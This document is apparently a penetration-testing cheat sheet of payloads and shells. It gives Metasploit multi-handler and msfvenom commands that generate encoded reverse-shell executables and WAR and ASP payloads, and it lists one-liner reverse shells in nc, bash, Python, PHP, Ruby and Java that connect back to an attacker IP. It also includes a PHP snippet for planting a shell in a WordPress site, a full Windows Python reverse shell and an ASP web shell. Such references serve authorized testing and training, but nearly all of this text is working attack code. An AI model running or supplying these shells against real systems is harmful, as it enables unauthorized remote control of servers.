Payloads and Shells

Please read the Disclaimer.

Metasploit

Multi-handler

Start Metesploit:

msfconsole

Set multi handler module:

use exploit/multi/handler

Then setup a shell:

set payload windows/x64/shell/reverse_tcp
set payload windows/shell/reverse_tcp
set payload windows/meterpreter/reverse_tcp
set payload linux/x64/shell/reverse_tcp
set payload linux/x86/shell/reverse_tcp
set payload java/jsp_shell_reverse_tcp

Set local host:

set LHOST <attacking-ipaddress>

Start:

run

Msfvenom

Common Payloads

This can be run outside msfconsole.

Buffer overflow code for Linux with bad characters in C:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacking-ipaddress> LPORT=4444 -f c -b "\x00" –e x86/shikata_ga_nai

Linux payload for bash:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacking-ipaddress> LPORT=4444 CMD=/bin/bash -f js_le -e generic/none

Java payload to a war file:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacking-ipaddress> LPORT=4444 -f war > shell.war

Microsoft Windows asp reverse shell:

msfvenom -p windows/shell_reverse_tcp -f asp LHOST=<attacking-ipaddress> LPORT=4444 -o shell.asp

Windows executable reverse shell:

msfvenom -p windows/shell/reverse_tcp LHOST=<attacking-ipaddress> LPORT=4444 -e x86/shikata_ga_nai X > shell.exe

Common Reverse Shells

Linux

NC

nc <ipaddress> <port> -e /bin/sh

NC Traditional

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ipaddress> <port> >/tmp/f;/tmp/f

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ipaddress>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash

bash -i >& /dev/tcp/<ipaddress>/<port> 0>&1

PHP

php -r '$sock=fsockopen("<ipaddress>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

PHP ALT

php -r '$sock=fsockopen("<ipaddress>",<port>);$proc = proc_open('/bin/sh -i', array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);'

PHP ALT 2

<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ipaddress> <port> >/tmp/f'); ?>

PHP WordPress

<?php if(is_home()) { exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ipaddress> <port> >/tmp/f'); } ?>

Ruby

ruby -rsocket -e'f=TCPSocket.open("<ipaddress>",<port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<ipaddress>/<port>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Windows

NC

nc <ipaddress> <port> -e C:\Windows\System32\cmd.exe

Python

import os,socket,subprocess,threading;
def s2p(s, p):
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)

def p2s(s, p):
    while True:
        s.send(p.stdout.read(1))

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<ipaddress>",<port>))

p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()

asp

Credit: Maceo – maceo @ dogmile.com

<%@ Language=VBScript %>
<%
  Dim oScript
  Dim oScriptNet
  Dim oFileSys, oFile
  Dim szCMD, szTempFile

  On Error Resume Next

  ' -- create the COM objects that we will be using -- '
  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

  ' -- check for a command that we have posted -- '
  szCMD = Request.Form(".CMD")
  If (szCMD <> "") Then

    ' -- Use a poor man's pipe ... a temp file -- '
    szTempFile = "C:\" & oFileSys.GetTempName( )
    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)

  End If

%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
  If (IsObject(oFile)) Then
    ' -- Read the output from our command and remove the temp file -- '
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
  End If
%>
</BODY>
</HTML>

Fixing Shells

stty rows 39
stty columns 70
export TERM=xterm-256color

Upgrade shell:

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'